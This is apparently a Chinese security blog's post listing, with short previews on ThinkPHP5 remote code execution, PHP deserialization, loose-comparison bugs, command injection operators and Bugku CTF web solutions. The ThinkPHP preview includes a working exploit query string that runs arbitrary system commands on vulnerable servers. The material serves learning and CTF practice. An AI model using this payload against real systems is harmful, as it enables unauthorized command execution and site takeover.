- 博客(7)
- 收藏
- 关注
原创 ThinkPHP5.x rec漏洞
漏洞详情由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接GetWebShell。影响版本ThinkPHP 5.0系列 < 5.0.23ThinkPHP 5.1系列 < 5.1.31漏洞利用?s=index/\think\App/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[命令].
2020-09-23 10:58:31
504
原创 CVE-2016-7124及反序列化漏洞学习
序列化和反序列化serialize ()serialize() 返回字符串,此字符串包含了表示 value 的字节流,可以存储于任何地方。简单来讲,就是将对象转化为可以传输的字符串,字符串中存储着对象的变量、类型等。举例如下:<?php class test{ public $name = "wcute"; public $age = "18";}$fairy = new test();echo serialize($fairy); ?>unseri.
2020-09-23 09:30:24
367
原创 PHP弱类型比较漏洞
php中有两种比较符号=== 会同时比较字符串的值和类型== 会先将字符串换成相同类型,再作比较,属于弱类型比较PHP松散比较“==”的比较表PHP官网表格:http://php.net/manual/zh/types.comparisons.php举例<?phpvar_dump(1=="1");var_dump(123=='123asd');var_dump("1"==true);var_dump("0"==false);var_dump(-1 == true);.
2020-09-22 23:00:38
484
原创 页面允许命令执行漏洞
windows 或 linux 下:command1 && command2 先执行 command1,如果为真,再执行 command2command1 | command2 只执行 command2command1 & command2 先执行 command2 后执行 command1command1 || command2 先执行 command1,如果为假,再执行 command2命令执行漏洞(| || & && 称为 管道符)...
2020-09-22 20:37:40
128
原创 CTF|BugkuCTF-WEB解题思路
截止至练习题【login4】,仅提供解题思路。WEB2按F12直接可得flag计算器:直接按F12,将maxlength修改,输入正确结果即可得到flagweb基础$_GETURL输入:http://123.206.87.240:8002/get/?what=flagweb基础$_POST使用hackbar工具,按F12,打开Post data,传递what=flag。矛盾这里是使用is_numeric遇到%00截断的漏洞,这里构造http://120.24.86.145:8002.
2020-06-15 13:47:21
2144
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人